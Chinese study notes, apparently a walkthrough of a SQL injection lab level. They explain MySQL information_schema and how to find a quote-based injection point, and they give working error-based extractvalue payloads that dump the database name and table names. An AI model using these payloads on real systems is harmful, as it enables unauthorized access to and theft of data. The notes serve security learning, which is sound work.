知识点：

• 报错注入函数语法（详见第二关笔记）
• 报错注入打印位数最多32位
• 对于大于32位的数据最好使用截取函数进行控制；以保证输出完整
• mysql表中的重点数据库
  • information_schema   （mysql 5.0以上）
    • schemata     存放所有数据库名
      • schema_name
    • tables     存放所有表名
      • table_schema
      • table_name
    • columns    存放所有字段名
      • table_schema
      • table_name
      • column_name

首先检测注入类型

构造id=1/0

发现输出了一句话；没有报错；但也没有任何有价值的信息

构造id=1

发现输出和1/0一样；说明是字符型注入，而且回显信息固定，无价值

构造id=1'

发现报错了；好的；说明还是单引号的输入提取

进一步验证；构造id=1''

正常输出内容；确认这里存在字符型注入点

由于回显内容固定，所以不能采用联合注入了，只能进行错误注入了

构造payload:id=1' and extractvalue(1,concat(0x7e,database(),0x7e))+--+

成功输出了数据库的名字

下面进一步输出表的名字

构造payload:id=1%27%20and%20extractvalue(1,concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27),0x7e))+--+

发现也是可以输出的；错误注入的效果还是挺大的

但是这里得注意一个问题：错误注入的输出限制是32位；最好采用截取函数进行控制

10